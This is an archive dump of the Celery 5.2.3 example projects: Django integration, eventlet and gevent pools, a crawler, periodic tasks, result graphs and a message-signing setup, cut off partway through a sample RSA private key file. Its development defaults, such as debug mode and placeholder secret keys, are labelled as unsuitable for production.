DEBUG = True TEMPLATE_DEBUG = DEBUG CELERY_RESULT_BACKEND = 'database' BROKER_URL = 'amqp://guest:guest@localhost:5672//' ADMINS = ( # ('Your Name', 'your_email@domain.com'), ) MANAGERS = ADMINS DATABASES = { 'default': { 'ENGINE': 'django.db.backends.sqlite3', 'NAME': 'development.db', 'USER': '', 'PASSWORD': '', 'HOST': '', 'PORT': '', } } if django.VERSION[:3] < (1, 3): DATABASE_ENGINE = DATABASES['default']['ENGINE'] DATABASE_NAME = DATABASES['default']['NAME'] DATABASE_USER = DATABASES['default']['USER'] DATABASE_PASSWORD = DATABASES['default']['PASSWORD'] DATABASE_HOST = DATABASES['default']['HOST'] DATABASE_PORT = DATABASES['default']['PORT'] # Local time zone for this installation. Choices can be found here: # https://en.wikipedia.org/wiki/List_of_tz_zones_by_name # although not all choices may be available on all operating systems. # If running in a Windows environment this must be set to the same as your # system time zone. TIME_ZONE = 'America/Chicago' # Language code for this installation. All choices can be found here: # http://www.i18nguy.com/unicode/language-identifiers.html LANGUAGE_CODE = 'en-us' SITE_ID = 1 # If you set this to False, Django will make some optimizations so as not # to load the internationalization machinery. USE_I18N = True # Absolute path to the directory that holds media. # Example: '/home/media/media.lawrence.com/' MEDIA_ROOT = '' # URL that handles the media served from MEDIA_ROOT. Make sure to use a # trailing slash if there's a path component (optional in other cases). # Examples: 'http://media.lawrence.com', 'http://example.com/media/' MEDIA_URL = '' # URL prefix for admin media -- CSS, JavaScript and images. Make sure to use a # trailing slash. # Examples: 'http://foo.com/media/', '/media/'. ADMIN_MEDIA_PREFIX = '/media/' # Make this unique, and don't share it with anybody. # XXX TODO FIXME Set this secret key to anything you want, just change it! SECRET_KEY = 'This is not a secret, be sure to change this.' # List of callables that know how to import templates from various sources. TEMPLATE_LOADERS = ( 'django.template.loaders.filesystem.load_template_source', 'django.template.loaders.app_directories.load_template_source', ) MIDDLEWARE = [ 'django.middleware.common.CommonMiddleware', 'django.contrib.sessions.middleware.SessionMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware', ] ROOT_URLCONF = 'celery_http_gateway.urls' TEMPLATE_DIRS = ( # Put strings here, like '/home/html/django_templates' or # 'C:/www/django/templates'. # Always use forward slashes, even on Windows. # Don't forget to use absolute paths, not relative paths. 
) INSTALLED_APPS = ( 'django.contrib.auth', 'django.contrib.contenttypes', 'django.contrib.sessions', 'django.contrib.sites', 'djcelery', ) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/examples/celery_http_gateway/tasks.py0000664000175000017500000000013000000000000022247 0ustar00asifasif00000000000000from celery import task @task() def hello_world(to='world'): return f'Hello {to}' ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/examples/celery_http_gateway/urls.py0000664000175000017500000000131700000000000022117 0ustar00asifasif00000000000000from celery_http_gateway.tasks import hello_world from django.conf.urls.defaults import (handler404, handler500, # noqa include, patterns, url) from djcelery import views as celery_views # Uncomment the next two lines to enable the admin: # from django.contrib import admin # admin.autodiscover() urlpatterns = patterns( '', url(r'^apply/(?P.+?)/', celery_views.apply), url(r'^hello/', celery_views.task_view(hello_world)), url(r'^(?P[\w\d\-]+)/done/?$', celery_views.is_task_successful, name='celery-is_task_successful'), url(r'^(?P[\w\d\-]+)/status/?$', celery_views.task_status, name='celery-task_status'), ) ././@PaxHeader0000000000000000000000000000003300000000000011451 xustar000000000000000027 mtime=1640757094.707755 celery-5.2.3/examples/django/0000775000175000017500000000000000000000000015755 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/examples/django/README.rst0000664000175000017500000000301700000000000017445 0ustar00asifasif00000000000000============================================================== Example Django project using Celery ============================================================== Contents ======== ``proj/`` --------- This is a project in itself, created using ``django-admin.py startproject proj``, and then the settings module (``proj/settings.py``) was modified to add ``demoapp`` to ``INSTALLED_APPS`` ``proj/celery.py`` ---------- This module contains the Celery application instance for this project, we take configuration from Django settings and use ``autodiscover_tasks`` to find task modules inside all packages listed in ``INSTALLED_APPS``. ``demoapp/`` ------------ Example generic app. This is decoupled from the rest of the project by using the ``@shared_task`` decorator. This decorator returns a proxy that always points to the currently active Celery instance. Installing requirements ======================= The settings file assumes that ``rabbitmq-server`` is running on ``localhost`` using the default ports. More information here: http://docs.celeryproject.org/en/latest/getting-started/brokers/rabbitmq.html In addition, some Python requirements must also be satisfied: .. code-block:: console $ pip install -r requirements.txt Starting the worker =================== .. code-block:: console $ celery -A proj worker -l INFO Running a task =================== .. 
code-block:: console $ python ./manage.py shell >>> from demoapp.tasks import add, mul, xsum >>> res = add.delay(2,3) >>> res.get() 5 ././@PaxHeader0000000000000000000000000000003300000000000011451 xustar000000000000000027 mtime=1640757094.711755 celery-5.2.3/examples/django/demoapp/0000775000175000017500000000000000000000000017402 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/examples/django/demoapp/__init__.py0000664000175000017500000000000000000000000021501 0ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000003300000000000011451 xustar000000000000000027 mtime=1640757094.711755 celery-5.2.3/examples/django/demoapp/migrations/0000775000175000017500000000000000000000000021556 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/examples/django/demoapp/migrations/0001_initial.py0000664000175000017500000000074600000000000024230 0ustar00asifasif00000000000000# Generated by Django 2.2.1 on 2019-05-24 21:37 from django.db import migrations, models class Migration(migrations.Migration): initial = True dependencies = [ ] operations = [ migrations.CreateModel( name='Widget', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('name', models.CharField(max_length=140)), ], ), ] ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/examples/django/demoapp/migrations/__init__.py0000664000175000017500000000000000000000000023655 0ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/examples/django/demoapp/models.py0000664000175000017500000000014700000000000021241 0ustar00asifasif00000000000000from django.db import models class Widget(models.Model): name = models.CharField(max_length=140) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/examples/django/demoapp/tasks.py0000664000175000017500000000066500000000000021110 0ustar00asifasif00000000000000# Create your tasks here from demoapp.models import Widget from celery import shared_task @shared_task def add(x, y): return x + y @shared_task def mul(x, y): return x * y @shared_task def xsum(numbers): return sum(numbers) @shared_task def count_widgets(): return Widget.objects.count() @shared_task def rename_widget(widget_id, name): w = Widget.objects.get(id=widget_id) w.name = name w.save() ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/examples/django/demoapp/views.py0000664000175000017500000000003200000000000021104 0ustar00asifasif00000000000000# Create your views here. 
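# Illustrative sketch (not part of the original example): a minimal Django view
# that dispatches one of the demoapp tasks defined above and returns the task id,
# so the caller can poll for the result later. Assumes Django's JsonResponse.
from django.http import JsonResponse

from demoapp.tasks import add


def run_add(request):
    # Queue the task on the broker and respond immediately with its id.
    result = add.delay(2, 3)
    return JsonResponse({'task_id': result.id})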
././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/examples/django/manage.py0000775000175000017500000000037000000000000017562 0ustar00asifasif00000000000000#!/usr/bin/env python import os import sys if __name__ == '__main__': os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'proj.settings') from django.core.management import execute_from_command_line execute_from_command_line(sys.argv) ././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.7157552 celery-5.2.3/examples/django/proj/0000775000175000017500000000000000000000000016727 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/examples/django/proj/__init__.py0000664000175000017500000000025600000000000021043 0ustar00asifasif00000000000000# This will make sure the app is always imported when # Django starts so that shared_task will use this app. from .celery import app as celery_app __all__ = ('celery_app',) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/examples/django/proj/celery.py0000664000175000017500000000117700000000000020572 0ustar00asifasif00000000000000import os from celery import Celery # Set the default Django settings module for the 'celery' program. os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'proj.settings') app = Celery('proj') # Using a string here means the worker doesn't have to serialize # the configuration object to child processes. # - namespace='CELERY' means all celery-related configuration keys # should have a `CELERY_` prefix. app.config_from_object('django.conf:settings', namespace='CELERY') # Load task modules from all registered Django apps. app.autodiscover_tasks() @app.task(bind=True) def debug_task(self): print(f'Request: {self.request!r}') ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/examples/django/proj/settings.py0000664000175000017500000000706700000000000021153 0ustar00asifasif00000000000000import os # ^^^ The above is required if you want to import from the celery # library. If you don't have this then `from celery.schedules import` # becomes `proj.celery.schedules` in Python 2.x since it allows # for relative imports by default. # Celery settings CELERY_BROKER_URL = 'amqp://guest:guest@localhost' #: Only add pickle to this list if your broker is secured #: from unwanted access (see userguide/security.html) CELERY_ACCEPT_CONTENT = ['json'] CELERY_RESULT_BACKEND = 'db+sqlite:///results.sqlite' CELERY_TASK_SERIALIZER = 'json' """ Django settings for proj project. Generated by 'django-admin startproject' using Django 2.2.1. For more information on this file, see https://docs.djangoproject.com/en/2.2/topics/settings/ For the full list of settings and their values, see https://docs.djangoproject.com/en/2.2/ref/settings/ """ # Build paths inside the project like this: os.path.join(BASE_DIR, ...) BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) # Quick-start development settings - unsuitable for production # See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/ # SECURITY WARNING: keep the secret key used in production secret! SECRET_KEY = 'l!t+dmzf97rt9s*yrsux1py_1@odvz1szr&6&m!f@-nxq6k%%p' # SECURITY WARNING: don't run with debug turned on in production! 
DEBUG = True ALLOWED_HOSTS = [] # Application definition INSTALLED_APPS = [ 'django.contrib.admin', 'django.contrib.auth', 'django.contrib.contenttypes', 'django.contrib.sessions', 'django.contrib.messages', 'django.contrib.staticfiles', 'demoapp', ] MIDDLEWARE = [ 'django.middleware.security.SecurityMiddleware', 'django.contrib.sessions.middleware.SessionMiddleware', 'django.middleware.common.CommonMiddleware', 'django.middleware.csrf.CsrfViewMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware', 'django.contrib.messages.middleware.MessageMiddleware', 'django.middleware.clickjacking.XFrameOptionsMiddleware', ] ROOT_URLCONF = 'proj.urls' TEMPLATES = [ { 'BACKEND': 'django.template.backends.django.DjangoTemplates', 'DIRS': [], 'APP_DIRS': True, 'OPTIONS': { 'context_processors': [ 'django.template.context_processors.debug', 'django.template.context_processors.request', 'django.contrib.auth.context_processors.auth', 'django.contrib.messages.context_processors.messages', ], }, }, ] WSGI_APPLICATION = 'proj.wsgi.application' # Database # https://docs.djangoproject.com/en/2.2/ref/settings/#databases DATABASES = { 'default': { 'ENGINE': 'django.db.backends.sqlite3', 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'), } } # Password validation # https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators AUTH_PASSWORD_VALIDATORS = [ { 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator', }, { 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator', }, { 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator', }, { 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator', }, ] # Internationalization # https://docs.djangoproject.com/en/2.2/topics/i18n/ LANGUAGE_CODE = 'en-us' TIME_ZONE = 'UTC' USE_I18N = True USE_L10N = True USE_TZ = True # Static files (CSS, JavaScript, Images) # https://docs.djangoproject.com/en/2.2/howto/static-files/ STATIC_URL = '/static/' ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/examples/django/proj/urls.py0000664000175000017500000000105400000000000020266 0ustar00asifasif00000000000000from django.urls import handler404, handler500, include, url # noqa # Uncomment the next two lines to enable the admin: # from django.contrib import admin # admin.autodiscover() urlpatterns = [ # Examples: # url(r'^$', 'proj.views.home', name='home'), # url(r'^proj/', include('proj.foo.urls')), # Uncomment the admin/doc line below to enable admin documentation: # url(r'^admin/doc/', include('django.contrib.admindocs.urls')), # Uncomment the next line to enable the admin: # url(r'^admin/', include(admin.site.urls)), ] ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/examples/django/proj/wsgi.py0000664000175000017500000000215400000000000020254 0ustar00asifasif00000000000000""" WSGI config for proj project. This module contains the WSGI application used by Django's development server and any production WSGI deployments. It should expose a module-level variable named ``application``. Django's ``runserver`` and ``runfcgi`` commands discover this application via the ``WSGI_APPLICATION`` setting. Usually you will have the standard Django WSGI application here, but it also might make sense to replace the whole Django WSGI application with a custom one that later delegates to the Django one. 
For example, you could introduce WSGI middleware here, or combine a Django application with an application of another framework. """ import os # This application object is used by any WSGI server configured to use this # file. This includes Django's development server, if the WSGI_APPLICATION # setting points here. from django.core.wsgi import get_wsgi_application os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'proj.settings') application = get_wsgi_application() # Apply WSGI middleware here. # from helloworld.wsgi import HelloWorldApplication # application = HelloWorldApplication(application) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/examples/django/requirements.txt0000664000175000017500000000005700000000000021243 0ustar00asifasif00000000000000django>=2.2.1 sqlalchemy>=1.0.14 celery>=5.0.5 ././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.7197552 celery-5.2.3/examples/eventlet/0000775000175000017500000000000000000000000016341 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/examples/eventlet/README.rst0000664000175000017500000000270100000000000020030 0ustar00asifasif00000000000000================================== Example using the Eventlet Pool ================================== Introduction ============ This is a Celery application containing two example tasks. First you need to install Eventlet, and also recommended is the `dnspython` module (when this is installed all name lookups will be asynchronous):: $ pip install eventlet $ pip install dnspython $ pip install requests Before you run any of the example tasks you need to start the worker:: $ cd examples/eventlet $ celery worker -l INFO --concurrency=500 --pool=eventlet As usual you need to have RabbitMQ running, see the Celery getting started guide if you haven't installed it yet. Tasks ===== * `tasks.urlopen` This task simply makes a request opening the URL and returns the size of the response body:: $ cd examples/eventlet $ python >>> from tasks import urlopen >>> urlopen.delay('http://www.google.com/').get() 9980 To open several URLs at once you can do:: $ cd examples/eventlet $ python >>> from tasks import urlopen >>> from celery import group >>> result = group(urlopen.s(url) ... for url in LIST_OF_URLS).apply_async() >>> for incoming_result in result.iter_native(): ... print(incoming_result) * `webcrawler.crawl` This is a simple recursive web crawler. It will only crawl URLs for the current host name. Please see comments in the `webcrawler.py` file. 
././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/examples/eventlet/bulk_task_producer.py0000664000175000017500000000321100000000000022572 0ustar00asifasif00000000000000from eventlet import Timeout, monkey_patch, spawn_n from eventlet.event import Event from eventlet.queue import LightQueue monkey_patch() class Receipt: result = None def __init__(self, callback=None): self.callback = callback self.ready = Event() def finished(self, result): self.result = result if self.callback: self.callback(result) self.ready.send() def wait(self, timeout=None): with Timeout(timeout): return self.ready.wait() class ProducerPool: """Usage:: >>> app = Celery(broker='amqp://') >>> ProducerPool(app) """ Receipt = Receipt def __init__(self, app, size=20): self.app = app self.size = size self.inqueue = LightQueue() self._running = None self._producers = None def apply_async(self, task, args, kwargs, callback=None, **options): if self._running is None: self._running = spawn_n(self._run) receipt = self.Receipt(callback) self.inqueue.put((task, args, kwargs, options, receipt)) return receipt def _run(self): self._producers = [ spawn_n(self._producer) for _ in range(self.size) ] def _producer(self): inqueue = self.inqueue with self.app.producer_or_acquire() as producer: while 1: task, args, kwargs, options, receipt = inqueue.get() result = task.apply_async(args, kwargs, producer=producer, **options) receipt.finished(result) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/examples/eventlet/celeryconfig.py0000664000175000017500000000052000000000000021361 0ustar00asifasif00000000000000import os import sys sys.path.insert(0, os.getcwd()) # ## Start worker with -P eventlet # Never use the worker_pool setting as that'll patch # the worker too late. broker_url = 'amqp://guest:guest@localhost:5672//' worker_disable_rate_limits = True result_backend = 'amqp' result_expires = 30 * 60 imports = ('tasks', 'webcrawler') ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/examples/eventlet/tasks.py0000664000175000017500000000042500000000000020041 0ustar00asifasif00000000000000import requests from celery import task @task() def urlopen(url): print(f'-open: {url}') try: response = requests.get(url) except requests.exceptions.RequestException as exc: print(f'-url {url} gave error: {exc!r}') return len(response.text) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/examples/eventlet/webcrawler.py0000664000175000017500000000370600000000000021056 0ustar00asifasif00000000000000"""Recursive webcrawler example. For asynchronous DNS lookups install the `dnspython` package: $ pip install dnspython Requires the `pybloom` module for the bloom filter which is used to ensure a lower chance of recrawling a URL previously seen. Since the bloom filter is not shared, but only passed as an argument to each subtask, it would be much better to have this as a centralized service. Redis sets could also be a practical solution. A BloomFilter with a capacity of 100_000 members and an error rate of 0.001 is 2.8MB pickled, but if compressed with zlib it only takes up 2.9kB(!). We don't have to do compression manually, just set the tasks compression to "zlib", and the serializer to "pickle". 
""" import re import requests from eventlet import Timeout from pybloom import BloomFilter from celery import group, task try: from urllib.parse import urlsplit except ImportError: from urlparse import urlsplit # http://daringfireball.net/2009/11/liberal_regex_for_matching_urls url_regex = re.compile( r'\b(([\w-]+://?|www[.])[^\s()<>]+(?:\([\w\d]+\)|([^[:punct:]\s]|/)))') def domain(url): """Return the domain part of a URL.""" return urlsplit(url)[1].split(':')[0] @task(ignore_result=True, serializer='pickle', compression='zlib') def crawl(url, seen=None): print(f'crawling: {url}') if not seen: seen = BloomFilter(capacity=50000, error_rate=0.0001) with Timeout(5, False): try: response = requests.get(url) except requests.exception.RequestError: return location = domain(url) wanted_urls = [] for url_match in url_regex.finditer(response.text): url = url_match.group(0) # To not destroy the internet, we only fetch URLs on the same domain. if url not in seen and location in domain(url): wanted_urls.append(url) seen.add(url) subtasks = group(crawl.s(url, seen) for url in wanted_urls) subtasks.delay() ././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.7237554 celery-5.2.3/examples/gevent/0000775000175000017500000000000000000000000016003 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/examples/gevent/celeryconfig.py0000664000175000017500000000037700000000000021035 0ustar00asifasif00000000000000import os import sys sys.path.insert(0, os.getcwd()) # ## Note: Start worker with -P gevent, # do not use the worker_pool option. broker_url = 'amqp://guest:guest@localhost:5672//' result_backend = 'amqp' result_expires = 30 * 60 imports = ('tasks',) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/examples/gevent/tasks.py0000664000175000017500000000050500000000000017502 0ustar00asifasif00000000000000import requests from celery import task @task(ignore_result=True) def urlopen(url): print(f'Opening: {url}') try: requests.get(url) except requests.exceptions.RequestException as exc: print(f'Exception for {url}: {exc!r}') return url, 0 print(f'Done with: {url}') return url, 1 ././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.7237554 celery-5.2.3/examples/next-steps/0000775000175000017500000000000000000000000016625 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.7237554 celery-5.2.3/examples/next-steps/proj/0000775000175000017500000000000000000000000017577 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/examples/next-steps/proj/__init__.py0000664000175000017500000000000000000000000021676 0ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/examples/next-steps/proj/celery.py0000664000175000017500000000044600000000000021440 0ustar00asifasif00000000000000from celery import Celery app = Celery('proj', broker='amqp://', backend='rpc://', include=['proj.tasks']) # Optional configuration, see the application user guide. 
app.conf.update( result_expires=3600, ) if __name__ == '__main__': app.start() ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/examples/next-steps/proj/tasks.py0000664000175000017500000000024700000000000021301 0ustar00asifasif00000000000000from .celery import app @app.task def add(x, y): return x + y @app.task def mul(x, y): return x * y @app.task def xsum(numbers): return sum(numbers) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/examples/next-steps/setup.py0000664000175000017500000000231000000000000020333 0ustar00asifasif00000000000000""" Example setup file for a project using Celery. This can be used to distribute your tasks and worker as a Python package, on PyPI or on your own private package index. """ from setuptools import find_packages, setup setup( name='example-tasks', url='http://github.com/example/celery-tasks', author='Ola A. Normann', author_email='author@example.com', keywords='our celery integration', version='2.0', description='Tasks for my project', long_description=__doc__, license='BSD', packages=find_packages(exclude=['ez_setup', 'tests', 'tests.*']), test_suite='pytest', zip_safe=False, install_requires=[ 'celery>=5.0', # 'requests', ], classifiers=[ 'Development Status :: 5 - Production/Stable', 'License :: OSI Approved :: BSD License', 'Programming Language :: Python :: 3', 'Programming Language :: Python :: 3.6', 'Programming Language :: Python :: 3.7', 'Programming Language :: Python :: 3.8', 'Programming Language :: Python :: Implementation :: CPython', 'Programming Language :: Python :: Implementation :: PyPy3', 'Operating System :: OS Independent', ], ) ././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.7237554 celery-5.2.3/examples/periodic-tasks/0000775000175000017500000000000000000000000017434 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/examples/periodic-tasks/myapp.py0000664000175000017500000000276300000000000021144 0ustar00asifasif00000000000000"""myapp.py Usage:: # The worker service reacts to messages by executing tasks. (window1)$ python myapp.py worker -l INFO # The beat service sends messages at scheduled intervals. (window2)$ python myapp.py beat -l INFO # XXX To diagnose problems use -l debug: (window2)$ python myapp.py beat -l debug # XXX XXX To diagnose calculated runtimes use C_REMDEBUG envvar: (window2) $ C_REMDEBUG=1 python myapp.py beat -l debug You can also specify the app to use with the `celery` command, using the `-A` / `--app` option:: $ celery -A myapp worker -l INFO With the `-A myproj` argument the program will search for an app instance in the module ``myproj``. You can also specify an explicit name using the fully qualified form:: $ celery -A myapp:app worker -l INFO """ from celery import Celery app = Celery( # XXX The below 'myapp' is the name of this module, for generating # task names when executed as __main__. 'myapp', broker='amqp://guest@localhost//', # ## add result backend here if needed. # backend='rpc' ) app.conf.timezone = 'UTC' @app.task def say(what): print(what) @app.on_after_configure.connect def setup_periodic_tasks(sender, **kwargs): # Calls say('hello') every 10 seconds. 
sender.add_periodic_task(10.0, say.s('hello'), name='add every 10') # See periodic tasks user guide for more examples: # http://docs.celeryproject.org/en/latest/userguide/periodic-tasks.html if __name__ == '__main__': app.start() ././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.7237554 celery-5.2.3/examples/resultgraph/0000775000175000017500000000000000000000000017053 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/examples/resultgraph/tasks.py0000664000175000017500000000545400000000000020562 0ustar00asifasif00000000000000# Example:: # >>> R = A.apply_async() # >>> list(joinall(R)) # [['A 0', 'A 1', 'A 2', 'A 3', 'A 4', 'A 5', 'A 6', 'A 7', 'A 8', 'A 9'], # ['B 0', 'B 1', 'B 2', 'B 3', 'B 4', 'B 5', 'B 6', 'B 7', 'B 8', 'B 9'], # ['C 0', 'C 1', 'C 2', 'C 3', 'C 4', 'C 5', 'C 6', 'C 7', 'C 8', 'C 9'], # ['D 0', 'D 1', 'D 2', 'D 3', 'D 4', 'D 5', 'D 6', 'D 7', 'D 8', 'D 9'], # ['E 0', 'E 1', 'E 2', 'E 3', 'E 4', 'E 5', 'E 6', 'E 7', 'E 8', 'E 9'], # ['F 0', 'F 1', 'F 2', 'F 3', 'F 4', 'F 5', 'F 6', 'F 7', 'F 8', 'F 9'], # ['G 0', 'G 1', 'G 2', 'G 3', 'G 4', 'G 5', 'G 6', 'G 7', 'G 8', 'G 9'], # ['H 0', 'H 1', 'H 2', 'H 3', 'H 4', 'H 5', 'H 6', 'H 7', 'H 8', 'H 9']] # # # Joining the graph asynchronously with a callback # (Note: only two levels, the deps are considered final # when the second task is ready). # # >>> unlock_graph.apply_async((A.apply_async(), # ... A_callback.s()), countdown=1) from collections import deque from celery import chord, group, signature, task, uuid from celery.result import AsyncResult, ResultSet, allow_join_result @task() def add(x, y): return x + y @task() def make_request(id, url): print(f'-get: {url!r}') return url @task() def B_callback(urls, id): print(f'-batch {id} done') return urls @task() def B(id): return chord( make_request.s(id, f'{id} {i!r}') for i in range(10) )(B_callback.s(id)) @task() def A(): return group(B.s(c) for c in 'ABCDEFGH').apply_async() def joinall(R, timeout=None, propagate=True): stack = deque([R]) try: use_native = joinall.backend.supports_native_join except AttributeError: use_native = False while stack: res = stack.popleft() if isinstance(res, ResultSet): j = res.join_native if use_native else res.join stack.extend(j(timeout=timeout, propagate=propagate)) elif isinstance(res, AsyncResult): stack.append(res.get(timeout=timeout, propagate=propagate)) else: yield res @task() def unlock_graph(result, callback, interval=1, propagate=False, max_retries=None): if result.ready(): second_level_res = result.get() if second_level_res.ready(): with allow_join_result(): signature(callback).delay(list(joinall( second_level_res, propagate=propagate))) else: unlock_graph.retry(countdown=interval, max_retries=max_retries) @task() def A_callback(res): print(f'-everything done: {res!r}') return res class chord2: def __init__(self, tasks, **options): self.tasks = tasks self.options = options def __call__(self, body, **options): body.options.setdefault('task_id', uuid()) unlock_graph.apply_async() ././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.7237554 celery-5.2.3/examples/security/0000775000175000017500000000000000000000000016362 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 
celery-5.2.3/examples/security/mysecureapp.py0000664000175000017500000000204200000000000021267 0ustar00asifasif00000000000000"""mysecureapp.py Usage:: Generate Certificate: ``` mkdir ssl openssl req -x509 -newkey rsa:4096 -keyout ssl/worker.key -out ssl/worker.pem -days 365 # remove passphrase openssl rsa -in ssl/worker.key -out ssl/worker.key Enter pass phrase for ssl/worker.key: writing RSA key ``` cd examples/security (window1)$ python mysecureapp.py worker -l INFO (window2)$ cd examples/security (window2)$ python >>> from mysecureapp import boom >>> boom.delay().get() "I am a signed message" """ from celery import Celery app = Celery( 'mysecureapp', broker='redis://localhost:6379/0', backend='redis://localhost:6379/0' ) app.conf.update( security_key='ssl/worker.key', security_certificate='ssl/worker.pem', security_cert_store='ssl/*.pem', task_serializer='auth', event_serializer='auth', accept_content=['auth'], result_accept_content=['json'] ) app.setup_security() @app.task def boom(): return "I am a signed message" if __name__ == '__main__': app.start() ././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.7277553 celery-5.2.3/examples/security/ssl/0000775000175000017500000000000000000000000017163 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/examples/security/ssl/worker.key0000664000175000017500000000625300000000000021214 0ustar00asifasif00000000000000-----BEGIN RSA PRIVATE KEY----- MIIJJwIBAAKCAgEAshWXegn+JRX62T73jqFBVtugVWkqT+IGfEQXrL9Tz+sxDVxo f4PDeD7La0lXEppVEqBpR9maR/1CZAmKLmh6snpTC44JXJIRt7suWRQIuy/7f6TD Ouh3NtGoHpNuUj4dBkhNNKfHJe9A9LLKjSHplpBZyDwJzqWX8Y1pky8fJTMIuuR6 zZs8YR9hXi0/XyntS/We9XQRUCMpO85VVsVx/KGcYsTzD8ph/YG9HSriKKOvSfqt mef9Lzt2Psn6BnMk13H0UgrD8RGwv8cIVs4rMOYYnUfGe0p6nsnHCQIOOJBK58+H QJRtLNaoI5foSrlU74JzNIyImX/8ED33e1g9JerNVNpMeONvajdfxsn4Dl9haZch arwZKoL5o1RO8skDMZwV3VdlQT9908q2a40y7BfKRH3duvD7lexTUacyreakL73+ 24FFFnMCNrpRb58VaqmQASCGpfVv7RGLK3dxqKKpayL4ALdUXSlzZpXJ0nlyaA/A 68DbYmVooHHDwVLxxaA3MMOxIPYlOP/tHbh7hD+S+DE9+cFd/XEFejlUoUWEWiSn zecSfg+9WvUokUCzn0A/eWBYgB2cSNY2Rq0IqqjN/LpMlkwn377/4VmsB7fFrmj9 WEftKr4LQ8AHW/ryMRl1L0NrgOX7yfeyyze1T9nWE+I5pNsAY0ZKlS6vHwECAwEA AQKCAgAE4KiEdC+czmxPdPUM2AfVHDDZBgddpsAsuSS424itIjD2v7gw/eflrDqg 